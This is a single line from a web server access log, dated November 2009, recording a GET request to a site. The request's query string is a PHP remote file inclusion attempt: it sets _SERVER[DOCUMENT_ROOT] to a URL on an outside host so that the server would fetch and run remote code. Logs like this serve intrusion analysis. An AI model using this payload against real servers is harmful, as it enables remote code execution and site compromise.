85.111.12.199 - - [09/Nov/2009:06:08:51 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.thelumosalliance.com/cometchat/.../x???? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
